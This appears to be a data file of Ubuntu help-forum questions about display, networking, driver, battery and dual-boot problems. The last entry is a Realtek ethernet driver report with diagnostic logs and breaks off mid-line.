396762	unity and xinerama : 3 monitors on ubuntu 13.10	i have 2 video cards and 3 monitors . i want to use them all . unfortunately , this is the result : the picture of the first monitor is actually visible on the second monitor and so on . the mouse events , however , happen in the correct places . ( so i have to be on the actual first monitor to control what is appearing on the second monitor ) this seems like a relatively simple positioning issue . is there anyway to fix this ?
396768	how can i play radio stream as my startup ( login screen ) sound ?	i am familiar with how do i change the start up sound ? and chainging startup music of ubuntu , so i know how to change my startup sound to .ogg file of my choosing , but ... how to change it to some online radio stream ? so , as long as i do not log in , the steam is played . since it 's a stream , it will never end ( unless i log in , turn of the computer or disconnect from internet ) . is that even possible ? note : i am useing ubuntu 12.04 precise pangolin
396769	battery life becames shorter after upgrading	when i was using xubuntu 12.04 laptop could live 2-3 hours . now , after installing 13.04 battery life becomes shorter and shorter . xfce4-power-manager shows that battery is fully loaded , but after unplugging supplier , notebook works few minutes and goes down .
396770	laptop shutting down while work after update to ubuntu 13.10	i have lenovo z580 . before upgrading to 13.10 , i 've used ubuntu 13.04 , and everything was fine . now my laptop starts , and turns off . i just do something , and it just shuts down . how can i solve my problem ?
396774	unable to connect windows server 2008	i am using ubuntu desktop 12.04.3 x64 and windows 8 x64 ( dual boot ) and my organization has a server running on windows server 2008 . my problem is that i am able to ping and connect to our organization 's server from my windows os , but unable to ping the server from ubuntu os . when i am trying to ping from ubuntu it shows me an error ping : unknown host < servername > is there any settings that i need to change to connect the windows server ? edit 1 output of /etc/resolv.conf is as follows . # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 127.0.0.1 edit 2 yes . i am able to access the internet from my ubuntu pc and i am using wireless network connection . i do n't know whether my organization have any network control or not but i am able to access our organization 's server from windows os . output of ifconfig command is as follows . eth0 link encap : ethernet hwaddr 78:84:3c : ee:41:7e up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:822 errors:0 dropped:0 overruns:0 frame:0 tx packets:822 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:76415 ( 76.4 kb ) tx bytes:76415 ( 76.4 kb ) wlan0 link encap : ethernet hwaddr cc : af:78 : d1:8e:2d inet addr:192.168.1.7 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :ceaf:78ff : fed1:8e2d/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:7645 errors:0 dropped:0 overruns:0 frame:0 tx packets:6000 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:5249679 ( 5.2 mb ) tx bytes:1126018 ( 1.1 mb ) edit 3 output of nslookup google.com is as follows server : 127.0.0.1 address : 127.0.0.1 # 53 non-authoritative answer : name : google.com address : 74.125.200.138 name : google.com address : 74.125.200.139 name : google.com address : 74.125.200.100 name : google.com address : 74.125.200.101 name : google.com address : 74.125.200.102 name : google.com address : 74.125.200.113 thanks .
396775	installing windows 7 after ubuntu : returning /home to root partition , editing mbr	there 's nothing to be done , i need a windows os for work . the .iso should be ready , thanks to winusb . i have two questions : first , the hdd currently has four partitions : ext4 / ( boot ) /linux-swap ext4 /home /ntfs apparently win7 requires 2 primary partitions , so i assume that i will have to fold /home back in to the root partition . how should i do this ? second , to dual-boot , i understand that i will have to use a live usb to edit the mbr . how should i do this ?
396776	thunar mounts as root	i have a serious problem . i have 4 hdds . on the first one i have my op system , that 's fine . the others are empty with ext4 fs . when i try to mount those with thunar ( xubuntu what i have ) it mounts those with root owner . why ? thanks .
396779	dolphin file transfers over usb slows down system	i have noticed that almost every time i copy some data to a usb device using dolphin , my entire system slows down substantially ( to the point were even the mouse jitters when moving ) . i am not sure if this is a ubuntu specific problem or kde but i was hoping someone could give me more insight into what i am looking at as i have no found much material online regarding the problem ?
396780	ubuntu on an eeepc 1005ha netbook ?	i 've been given an old eeepc 1005ha netbook running windows xp and want to switch to a linux os and remove xp completely . is this easy/advisable ? what 's the best way ? the netbook has no cd drive i read about installing from usb but then the ubuntu site mentions using the windows installer ( not sure if this is only applicable if you want to add ubuntu to xp ) . also confused about setting new drive sizes . device is described as cpu intel atom n280 / 1.66 ghz , ram 1024 mb .
396795	what package is responsible for webcam detection ?	i am trying to report a bug but i am unsure about the package to report it under . what package is responsible for the detection of the webcam and creation of /dev/video0 device ?
396797	very slow wifi with dwa-140 rev : b2 wifi dongle	my wifi is extremely slow when i am using my wifi usb adapter dwa-140 in ubuntu 13.10 64bit . in windows i can easily get speeds of 3-3.5 mb/s . in ubuntu it has its peaks around 400 kb/s . i have already searched but not found any solution yet . since it is working on windows i would love to get it working on linux too instead of buying a new wifi adapter . my output of lsmod | grep ^rt : rt5572sta 798486 0 rt2800usb 27005 0 rt2x00usb 20713 1 rt2800usb rt2800lib 79963 1 rt2800usb rt2x00lib 55238 3 rt2x00usb , rt2800lib , rt2800usb if i blacklist rt2x , rt28 the adapter wont work anymore . it was a solution on some other question but did not help . i also ran sudo iwconfig wlan2 power off . it did not help either . how to fix this ?
396799	howto configure maas to separate pxe traffic and ipmi traffic on different subnets ?	i am trying to set up a part of our network as a linux cluster . since its a little educational for me , i choose using maas with juju . however there are some questions that boggle my mind and i was hoping that someone could clarify that for me . the linux cluster i 'm about to set up consists of 10 machines . half of it dell and the other hp . both types of machines have a lights-out module ( hp= > ilo2 , dell= > drac ) that support ipmi on a seperate 100mb nic . they both support pxe on the first onboard gigabit nic . i configured the lights out module with a static ip matching the physical layout of the racks and position height . installing maas however did n't ask me on what subnet and vlan the ipmi protocol should be configured . how do i do this ? also i want only the region controller to be able to contact the internet for package management . the other provisioned nodes should only be allowed to connect to the internet via a proxy on the region controller . so the region controller in my case should be configured with 3 subnets ; 1 for internet , 1 for client protocol connectivity and 1 for cluster traffic . the region controller itself should also be a node for juju . then at last there is the node configuration that should have a sort of basic layout that can be used within juju . as far as i could see there is no possibility to set up cluster subnet configuration . each machine has at least 4 nic 's that i like to assign the different subnets to ; 1 for the ipmi traffic , 1 for the pxe boot traffic , 1 for the cluster traffic and 1 for the storage/client network . what i like to do is to bond all these interfaces together as one big trunk and then use vlan 's to separate the traffic before provisioning . then when provisioning a node , maas should automagically configure the network interfaces as the layout suggests above . maybe what i 'm looking for is a advanced configuration tutorial/guide for maas and juju . regards , joham
396800	ubuntu does n't boot on the toshiba satellite c55-a	i downloaded the most recent version of ubuntu 64 bit on the site ( 13.10 i believe ) , and i installed it . this laptop had windows 8 pre installed on it . i have looked everywhere but ca n't seem to find my solution . when i restart my computer , i get a windows failed to start screen and then it has the option `` os selection '' and so i choose it it gives me the windows 8 os selection and both win8 and ubuntu are there , as i had hoped . so i click on ubuntu . after a while it takes me back to the error message . i really want my device to be windows 8 duel booted with ubuntu . can someone help me out please ?
396801	ubuntu touch phones/tablets as a desktop/laptop replacement	i read that ubuntu touch in docking mode will share the phone usb port to transfer video and audio to an hdmi monitor , usb devices data like keyboards , mouse and maybe external hard drives and joysticks . can ubuntu phones or tablets be a full replacement of ubuntu desktops/laptops , with the only limitation of cpu and graphics power , and adding external hard drives ? ( i.e . : play perfectly hd movies , and 3d games if cpu/gpu supports it ) or share the same usb port for everything will be a bottleneck ? thank you !
396802	will installing ubuntu using wubi have any performance disadvantage compared to a full installation ?	i wanted to try out ubuntu . i used wubi . i really like the appearance and `` feel '' to it , but it is noticeably slower than my windows 7 . i 'm wondering if this is because i am using wubi instead of a disk . will it be faster if i use ubuntu from disk and delete windows ? i definitely do n't want to end up with a slower os .
396804	rtl8111/8168b rev 06 ethernet controller not working with amd64 kernels > 2.6	i 'm also having trouble with the rtl8111 ethernet controller . it 's not working at all on ubuntu x64 . this is my card : $ lspci -nnk | grep -i net -a2 05:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 06 ) subsystem : gigabyte technology co. , ltd motherboard [ 1458 : e000 ] kernel driver in use : r8168 i tested it with following amd64 versions : mint 16 | kernel 3.11 | r8169 & r8168 not working debian 7.2 | kernel 3.2 | r8169 & r8168 not working ubuntu 13.10 | kernel 3.11 | r8169 & r8168 not working ubuntu 12.04.3 | kernel 3.8 | r8169 & r8168 not working ubuntu 12.04.2 | kernel 3.5 | r8169 & r8168 not working ubuntu 12.04.0 | kernel 3.2 | r8169 & r8168 not working ubuntu 11.10 | kernel 3.0 | r8169 & r8168 not working debian 6.0.7 | kernel 2.6 | r8169 working fine , r8168 working fine ubuntu 10.04.4 | kernel 2.6 | r8169 working with known problems , r8168 working fine smos1.2 ( debian ) | kernel 2.6 | r8169 working with known problems , r8168 working fine conclusion : the rev 06 of rtl8111/8168 is not working above amd64 kernel 2.6 this nic works with all i386 kernels . it did n't work with ndiswrapper on amd64 . regression : i blacklisted the driver r8169 and installed 8.036.00 over dkms based on this post by praseodym . i also tried the 037.deb package from launchpad with no luck i tried static ip 's / dhcp but the connection is n't working . i 'd like to offer a small btc donation like 0.03 btc for a working solution because i need this fixed asap . here 's a list of infos and logs : $ uname -a linux miner-rig1 3.8.0-34-generic # 49~precise1-ubuntu smp wed nov 13 18:05:00 utc 2013 x86_64 x86_64 x86_64 gnu/linux $ lspci -nnk | grep -i net -a2 04:06.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl-8139/8139c/8139c+ [ 10ec:8139 ] ( rev 10 ) subsystem : allied telesis at-2500tx/acpi [ 1259:2503 ] kernel driver in use : 8139too -- 05:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller [ 10ec:8168 ] ( rev 06 ) subsystem : gigabyte technology co. , ltd motherboard [ 1458 : e000 ] kernel driver in use : r8168 $ cat /etc/network/interfaces auto lo iface lo inet loopback $ cat /etc/resolv.conf # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 127.0.0.1 search fritz.box $ cat /etc/hosts 127.0.0.1 localhost 127.0.1.1 miner-rig1 # the following lines are desirable for ipv6 capable hosts : :1 ip6-localhost ip6-loopback fe00 : :0 ip6-localnet ff00 : :0 ip6-mcastprefix ff02 : :1 ip6-allnodes ff02 : :2 ip6-allrouters $ cat /etc/udev/rules.d/70-persistent-net.rules # pci device 0x10ec : /sys/devices/pci0000:00/0000:00:15.0/0000:05:00.0 ( r8169 ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' 94 : de:80 : a7 : c4 : ea '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' eth0 '' # pci device 0x10ec : /sys/devices/pci0000:00/0000:00:14.4/0000:04:06.0 ( 8139too ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' 00:30:84:2a : cc:12 '' , attr { dev_id } == '' 0x0 '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' eth1 '' $ ifconfig eth0 link encap : ethernet hwaddr 94 : de:80 : a7 : c4 : ea inet6 addr : fe80 : :96de:80ff : fea7 : c4ea/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:16 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:370 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:1522 ( 1.5 kb ) tx bytes:0 ( 0.0 b ) interrupt:76 base address:0xe000 eth1 link encap : ethernet hwaddr 00:30:84:2a : cc:12 inet addr:192.168.188.41 bcast:192.168.188.255 mask:255.255.255.0 inet6 addr : fe80 : :230:84ff : fe2a : cc12/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:16182 errors:0 dropped:0 overruns:0 frame:0 tx packets:36773 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:1304413 ( 1.3 mb ) tx bytes:35558704 ( 35.5 mb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:64402 errors:0 dropped:0 overruns:0 frame:0 tx packets:64402 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:90356022 ( 90.3 mb ) tx bytes:90356022 ( 90.3 mb ) $ route -n destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.188.1 0.0.0.0 ug 0 0 0 eth1 169.254.0.0 0.0.0.0 255.255.0.0 u 1000 0 0 eth1 192.168.188.0 0.0.0.0 255.255.255.0 u 1 0 0 eth1 $ dmesg [ 0.309661 ] pci 0000:05:00.0 : [ 10ec:8168 ] type 00 class 0x020000 [ 0.309676 ] pci 0000:05:00.0 : reg 10 : [ io 0xb000-0xb0ff ] [ 0.309701 ] pci 0000:05:00.0 : reg 18 : [ mem 0xfe600000-0xfe600fff 64bit ] [ 0.309717 ] pci 0000:05:00.0 : reg 20 : [ mem 0xd0900000-0xd0903fff 64bit pref ] [ 0.309784 ] pci 0000:05:00.0 : supports d1 d2 [ 0.309785 ] pci 0000:05:00.0 : pme # supported from d0 d1 d2 d3hot d3cold [ 1.273121 ] r8168 gigabit ethernet driver 8.036.00-napi loaded [ 1.273203 ] r8168 0000:05:00.0 : irq 76 for msi/msi-x [ 1.283778 ] eth % d : 0xffffc9000007e000 , 94 : de:80 : a7 : c4 : ea , irq 76 [ 1.283940 ] r8168 : this product is covered by one or more of the following patents : us6,570,884 , us6,115,776 , and us6,327,625 . [ 1.283944 ] r8168 copyright ( c ) 2013 realtek nic software team < nicfae @ realtek.com > [ 1.283944 ] this program comes with absolutely no warranty ; for details , please see < http : //www.gnu.org/licenses/ > . [ 1.283944 ] this is free software , and you are welcome to redistribute it under certain conditions ; see < http : //www.gnu.org/licenses/ > . [ 8.423951 ] r8168 : eth0 : link up $ cat /var/lib/networkmanager/networkmanager.state [ main ] networkingenabled=true wirelessenabled=true wwanenabled=true wimaxenabled=true $ lsmod 8139too 32183 0 r8168 260948 0 $ sudo ethtool eth0 settings for eth0 : supported ports : [ tp ] supported link modes : 10baset/half 10baset/full 100baset/half 100baset/full 1000baset/full supported pause frame use : no supports auto-negotiation : yes advertised link modes : 10baset/half 10baset/full 100baset/half 100baset/full 1000baset/full advertised pause frame use : symmetric receive-only advertised auto-negotiation : yes speed : 100mb/s duplex : full port : twisted pair phyad : 0 transceiver : internal auto-negotiation : on mdi-x : unknown supports wake-on : pumbg wake-on : g current message level : 0x00000033 ( 51 ) drv probe ifdown ifup link detected : yes $ cat syslog ( eth0 is the corrupt 8111 controller , eth1 is working ) 21:16:56 kernel : [ 0.000000 ] percpu : embedded 28 pages/cpu @ ffff88023ec00000 s84928 r8192 d21568 u262144 21:16:56 kernel : [ 0.000000 ] pcpu-alloc : s84928 r8192 d21568 u262144 alloc=1*2097152 21:16:56 kernel : [ 0.256453 ] net : registered protocol family 16 21:16:56 kernel : [ 0.342139 ] netlabel : initializing 21:16:56 kernel : [ 0.342141 ] netlabel : domain hash size = 128 21:16:56 kernel : [ 0.342142 ] netlabel : protocols = unlabeled cipsov4 21:16:56 kernel : [ 0.342150 ] netlabel : unlabeled traffic allowed by default 21:16:56 kernel : [ 0.357055 ] net : registered protocol family 2 21:16:56 kernel : [ 0.357763 ] net : registered protocol family 1 21:16:56 kernel : [ 0.897306 ] audit : initializing netlink socket ( disabled ) 21:16:56 kernel : [ 1.218874 ] net : registered protocol family 10 21:16:56 kernel : [ 1.219000 ] net : registered protocol family 17 21:16:56 kernel : [ 1.278661 ] r8168 gigabit ethernet driver 8.036.00-napi loaded 21:16:56 kernel : [ 1.278738 ] r8168 0000:05:00.0 : irq 76 for msi/msi-x 21:16:56 kernel : [ 1.289300 ] eth % d : 0xffffc9000007e000 , 94 : de:80 : a7 : c4 : ea , irq 76 21:16:56 kernel : [ 1.289452 ] r8168 : this product is covered by one or more of the following patents : us6,570,884 , us6,115,776 , and us6,327,625 . 21:16:56 kernel : [ 1.289459 ] r8168 copyright ( c ) 2013 realtek nic software team < nicfae @ realtek.com > 21:16:56 kernel : [ 1.292382 ] 8139cp : 8139cp : 10/100 pci et ernet driver v1.3 ( mar 22 , 2004 ) 21:16:56 kernel : [ 1.293719 ] 8139too : 8139too fast etherne driver 0.9.28 21:16:56 kernel : [ 1.294824 ] 8139too 0000:04:06.0 eth1 : realtek rtl8139 at 0x000000000001c000 , 00:30:84:2a : cc:12 , irq 20 21:16:56 kernel : [ 2.148715 ] ipv6 : addrconf ( netdev_up ) : et 0 : link is not ready 21:16:56 kernel : [ 2.148720 ] ipv6 : addrconf ( netdev_up ) : et 1 : link is not ready 21:16:56 kernel : [ 2.312197 ] microcode : microcode update driver : v2.00 < tigran @ aivazian.fsnet.co.uk > , peter oruba 21:16:56 kernel : [ 2.483450 ] type=1400 audit ( 1388348216.756:5 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=751 comm= '' apparmor_parser '' 21:16:56 kernel : [ 2.483604 ] type=1400 audit ( 1388348216.756:7 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=750 comm= '' apparmor_parser '' 21:16:56 kernel : [ 2.483610 ] type=1400 audit ( 1388348216.756:8 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=763 comm= '' apparmor_parser '' 21:16:56 kernel : [ 2.645814 ] net : registered protocol family 31 21:16:56 avahi-daemon [ 922 ] : network interface enumeration completed . 21:16:56 kernel : [ 2.658659 ] bluetooth : bnep ( ethernet emulation ) ver 1.3 21:16:56 networkmanager [ 932 ] : < info > networkmanager ( version 0.9.4.0 ) is starting ... 21:16:56 networkmanager [ 932 ] : < info > read config file /etc/ne workmanager/networkmanager.conf 21:16:56 networkmanager [ 932 ] : < info > vpn : loaded org.freedesktop.networkmanager.pptp 21:16:56 networkmanager [ 932 ] : < info > dns : loaded plugin dnsmasq 21:16:57 networkmanager [ 932 ] : scplugin-ifupdown : init ! 21:16:57 networkmanager [ 932 ] : scplugin-ifupdown : update_system_hostname 21:16:57 networkmanager [ 932 ] : scpluginifupdown : management mode : unmanaged 21:16:57 networkmanager [ 932 ] : scplugin-ifupdown : devices added ( path : /sys/devices/pci0000:00/0000:00:14.4/0000:04:06.0/net/eth1 , iface : eth1 ) 21:16:57 networkmanager [ 932 ] : scplugin-ifupdown : device added ( path : /sys/devices/pci0000:00/0000:00:14.4/0000:04:06.0/net/eth1 , iface : et 1 ) : no ifupdown configuration found . 21:16:57 networkmanager [ 932 ] : scplugin-ifupdown : devices added ( path : /sys/devices/pci0000:00/0000:00:15.0/0000:05:00.0/net/eth0 , iface : eth0 ) 21:16:57 networkmanager [ 932 ] : scplugin-ifupdown : device added ( path : /sys/devices/pci0000:00/0000:00:15.0/0000:05:00.0/net/eth0 , iface : et 0 ) : no ifupdown configuration found . 21:16:57 networkmanager [ 932 ] : scplugin-ifupdown : devices added ( path : /sys/devices/virtual/net/lo , iface : lo ) 21:16:57 networkmanager [ 932 ] : scplugin-ifupdown : device added ( path : /sys/devices/virtual/net/lo , iface : lo ) : no ifupdown configuration found . 21:16:57 networkmanager [ 932 ] : scplugin-ifupdown : end _init . 21:16:57 networkmanager [ 932 ] : < info > loaded plugin ifupdown : ( c ) 2008 canonical ltd. to report bugs please use the networkmanager mailing list . 21:16:57 networkmanager [ 932 ] : < info > loaded plugin keyfile : ( c ) 2007 - 2010 red hat , inc. to report bugs please use the networkmanager mailing list . 21:16:57 networkmanager [ 932 ] : ifupdown : get unmanaged devices count : 0 21:16:57 networkmanager [ 932 ] : scplugin-ifupdown : ( 15243056 ) ... get_connections . 21:16:57 networkmanager [ 932 ] : scplugin-ifupdown : ( 15243056 ) ... get_connections ( managed=false ) : return empty list . 21:16:57 networkmanager [ 932 ] : keyfile : parsing 8111 dhcp ... 21:16:57 networkmanager [ 932 ] : keyfile : read connection '8111 dhcp' 21:16:57 networkmanager [ 932 ] : keyfile : parsing working eth card ... 21:16:57 networkmanager [ 932 ] : keyfile : read connection 'working eth card' 21:16:57 networkmanager [ 932 ] : ifupdown : get unmanaged devices count : 0 21:16:57 networkmanager [ 932 ] : < info > modem-manager is now available 21:16:57 networkmanager [ 932 ] : < info > monitoring kernel firmware directory '/lib/firmware ' . 21:16:57 networkmanager [ 932 ] : < info > wifi enabled by radio killswitch ; enabled by state file 21:16:57 networkmanager [ 932 ] : < info > wwan enabled by radio killswitch ; enabled by state file 21:16:57 networkmanager [ 932 ] : < info > wimax enabled by radio killswitch ; enabled by state file 21:16:57 networkmanager [ 932 ] : < info > networking is enabled by state file 21:16:57 networkmanager [ 932 ] : < warn > failed to allocate link cache : ( -10 ) operation not supported 21:16:57 networkmanager [ 932 ] : < info > ( eth1 ) : carrier is off 21:16:57 networkmanager [ 932 ] : < info > ( eth1 ) : new ethernet device ( driver : '8139too ' ifindex : 3 ) 21:16:57 networkmanager [ 932 ] : < info > ( eth1 ) : exported as /org/freedesktop/networkmanager/devices/0 21:16:57 networkmanager [ 932 ] : < info > ( eth1 ) : now managed 21:16:57 networkmanager [ 932 ] : < info > ( eth1 ) : device state change : unmanaged - > unavailable ( reason 'managed ' ) [ 10 20 2 ] 21:16:57 networkmanager [ 932 ] : < info > ( eth1 ) : bringing up device . 21:16:57 networkmanager [ 932 ] : < info > ( eth1 ) : carrier now on ( device state 20 ) 21:16:57 networkmanager [ 932 ] : < info > ( eth1 ) : preparing device . 21:16:57 networkmanager [ 932 ] : < info > ( eth1 ) : deactivating device ( reason 'managed ' ) [ 2 ] 21:16:57 networkmanager [ 932 ] : < warn > failed to allocate link cache : ( -10 ) operation not supported 21:16:57 kernel : [ 2.773422 ] 8139too 0000:04:06.0 eth1 : link up , 100mbps , full-duplex , lpa 0x45e1 21:16:57 networkmanager [ 932 ] : < info > ( eth0 ) : carrier is off 21:16:57 networkmanager [ 932 ] : < info > ( eth0 ) : new ethernet device ( driver : 'r8168 ' ifindex : 2 ) 21:16:57 networkmanager [ 932 ] : < info > ( eth0 ) : exported as /org/freedesktop/networkmanager/devices/1 21:16:57 networkmanager [ 932 ] : < info > ( eth0 ) : now managed 21:16:57 networkmanager [ 932 ] : < info > ( eth0 ) : device state change : unmanaged - > unavailable ( reason 'managed ' ) [ 10 20 2 ] 21:16:57 networkmanager [ 932 ] : < info > ( eth0 ) : bringing up device . 21:16:57 networkmanager [ 932 ] : < info > ( eth0 ) : preparing device . 21:16:57 networkmanager [ 932 ] : < info > ( eth0 ) : deactivating device ( reason 'managed ' ) [ 2 ] 21:16:57 kernel : [ 2.832528 ] ipv6 : addrconf ( netdev_up ) : et 0 : link is not ready 21:16:57 kernel : [ 2.832766 ] ipv6 : addrconf ( netdev_up ) : et 0 : link is not ready 21:16:57 networkmanager [ 932 ] : < info > ( eth1 ) : device state change : unavailable - > disconnected ( reason 'none ' ) [ 20 30 0 ] 21:16:57 networkmanager [ 932 ] : < info > auto-activating connection 'working eth card ' . 21:16:57 networkmanager [ 932 ] : < info > activation ( eth1 ) starting connection 'working eth card' 21:16:57 networkmanager [ 932 ] : < info > ( eth1 ) : device state change : disconnected - > prepare ( reason 'none ' ) [ 30 40 0 ] 21:16:57 networkmanager [ 932 ] : < info > activation ( eth1 ) stage 1 of 5 ( device prepare ) scheduled ... 21:16:57 networkmanager [ 932 ] : < info > activation ( eth1 ) stage 1 of 5 ( device prepare ) started ... 21:16:57 networkmanager [ 932 ] : < info > activation ( eth1 ) stage 2 of 5 ( device configure ) scheduled ... 21:16:57 networkmanager [ 932 ] : < info > activation ( eth1 ) stage 1 of 5 ( device prepare ) complete . 21:16:57 networkmanager [ 932 ] : < info > activation ( eth1 ) stage 2 of 5 ( device configure ) starting ... 21:16:57 networkmanager [ 932 ] : < info > ( eth1 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] 21:16:57 networkmanager [ 932 ] : < info > activation ( eth1 ) stage 2 of 5 ( device configure ) successful . 21:16:57 networkmanager [ 932 ] : < info > activation ( eth1 ) stage 3 of 5 ( ip configure start ) scheduled . 21:16:57 networkmanager [ 932 ] : < info > activation ( eth1 ) stage 2 of 5 ( device configure ) complete . 21:16:57 networkmanager [ 932 ] : < info > activation ( eth1 ) stage 3 of 5 ( ip configure start ) started ... 21:16:57 networkmanager [ 932 ] : < info > ( eth1 ) : device state change : config - > ip-config ( reason 'none ' ) [ 50 70 0 ] 21:16:57 networkmanager [ 932 ] : < info > activation ( eth1 ) beginning dhcpv4 transaction ( timeout in 45 seconds ) 21:16:57 networkmanager [ 932 ] : < info > dhclient started with pid 1058 21:16:57 networkmanager [ 932 ] : < info > activation ( eth1 ) beginning ip6 addrconf . 21:16:57 networkmanager [ 932 ] : < info > activation ( eth1 ) stage 3 of 5 ( ip configure start ) complete . 21:16:57 dhclient : internet systems consortium dhcp client 4.1-esv-r4 21:16:57 dhclient : copyright 2004-2011 internet systems consortium . 21:16:57 networkmanager [ 932 ] : < info > ( eth1 ) : dhcpv4 state changed nbi - > preinit 21:16:57 dhclient : listening on lpf/eth1/00:30:84:2a : cc:12 21:16:57 dhclient : sending on lpf/eth1/00:30:84:2a : cc:12 21:16:57 dhclient : dhcprequest of 192.168.188.41 on eth1 to 255.255.255.255 port 67 21:16:57 networkmanager [ 932 ] : < info > ( eth1 ) : dhcpv4 state changed preinit - > reboot 21:16:57 networkmanager [ 932 ] : < info > address 192.168.188.41 21:16:57 networkmanager [ 932 ] : < info > prefix 24 ( 255.255.255.0 ) 21:16:57 networkmanager [ 932 ] : < info > gateway 192.168.188.1 21:16:57 networkmanager [ 932 ] : < info > nameserver '192.168.188.1' 21:16:57 networkmanager [ 932 ] : < info > domain name 'fritz.box' 21:16:57 networkmanager [ 932 ] : < info > activation ( eth1 ) stage 5 of 5 ( ipv4 configure commit ) scheduled ... 21:16:57 networkmanager [ 932 ] : < info > activation ( eth1 ) stage 5 of 5 ( ipv4 commit ) started ... 21:16:57 avahi-daemon [ 922 ] : joining mdns multicast group on interface eth1.ipv4 with address 192.168.188.41 . 21:16:57 avahi-daemon [ 922 ] : new relevant interface eth1.ipv4 for mdns . 21:16:57 avahi-daemon [ 922 ] : registering new address record for 192.168.188.41 on eth1.ipv4 . 21:16:58 networkmanager [ 932 ] : < info > dns : starting dnsmasq ... 21:16:58 networkmanager [ 932 ] : < error > [ 1388348218.141241 ] [ nm-dns-dnsmasq.c:393 ] update ( ) : dnsmasq not available on the bus , ca n't update servers . 21:16:58 networkmanager [ 932 ] : < error > [ 1388348218.141259 ] [ nm-dns-dnsmasq.c:395 ] update ( ) : dnsmasq owner not found on bus : could not get owner of name 'uk.org.thekelleys.dnsmasq ' : no such name 21:16:58 networkmanager [ 932 ] : < warn > dns : plugin dnsmasq update failed 21:16:58 networkmanager [ 932 ] : < info > ( eth1 ) : writing resolv.conf to /sbin/resolvconf 21:16:58 networkmanager [ 932 ] : < info > ( eth1 ) : device state change : ip-config - > activated ( reason 'none ' ) [ 70 100 0 ] 21:16:58 networkmanager [ 932 ] : < info > policy set 'working eth card ' ( eth1 ) as default for ipv4 routing and dns . 21:16:58 networkmanager [ 932 ] : < info > activation ( eth1 ) successful , device activated . 21:16:58 networkmanager [ 932 ] : < info > activation ( eth1 ) stage 5 of 5 ( ipv4 commit ) complete . 21:16:58 networkmanager [ 932 ] : < warn > dnsmasq appeared on dbus : :1.24 21:16:58 networkmanager [ 932 ] : < info > ( eth1 ) : writing resolv.conf to /sbin/resolvconf 21:16:58 avahi-daemon [ 922 ] : joining mdns multicast group on interface eth1.ipv6 with address fe80 : :230:84ff : fe2a : cc12 . 21:16:58 avahi-daemon [ 922 ] : new relevant interface eth1.ipv6 for mdns . 21:16:58 avahi-daemon [ 922 ] : registering new address record for fe80 : :230:84ff : fe2a : cc12 on eth1.* . 21:16:59 kernel : [ 4.842503 ] r8168 : eth0 : link up 21:17:01 kernel : [ 6.852980 ] r8168 : eth0 : link up 21:17:01 kernel : [ 6.853014 ] ipv6 : addrconf ( netdev_change ) : eth0 : link becomes ready 21:17:01 networkmanager [ 932 ] : < info > ( eth0 ) : carrier now on ( device state 20 ) 21:17:01 networkmanager [ 932 ] : < info > ( eth0 ) : device state change : unavailable - > disconnected ( reason 'carrier-changed ' ) [ 20 30 40 ] 21:17:01 networkmanager [ 932 ] : < info > auto-activating connection '8111 dhcp ' . 21:17:01 networkmanager [ 932 ] : < info > activation ( eth0 ) starting connection '8111 dhcp' 21:17:01 networkmanager [ 932 ] : < info > ( eth0 ) : device state change : disconnected - > prepare ( reason 'none ' ) [ 30 40 0 ] 21:17:01 networkmanager [ 932 ] : < info > activation ( eth0 ) stage 1 of 5 ( device prepare ) scheduled ... 21:17:01 networkmanager [ 932 ] : < info > activation ( eth0 ) stage 1 of 5 ( device prepare ) started ... 21:17:01 networkmanager [ 932 ] : < info > activation ( eth0 ) stage 2 of 5 ( device configure ) scheduled ... 21:17:01 networkmanager [ 932 ] : < info > activation ( eth0 ) stage 1 of 5 ( device prepare ) complete . 21:17:01 networkmanager [ 932 ] : < info > activation ( eth0 ) stage 2 of 5 ( device configure ) starting ... 21:17:01 networkmanager [ 932 ] : < info > ( eth0 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] 21:17:01 networkmanager [ 932 ] : < info > activation ( eth0 ) stage 2 of 5 ( device configure ) successful . 21:17:01 networkmanager [ 932 ] : < info > activation ( 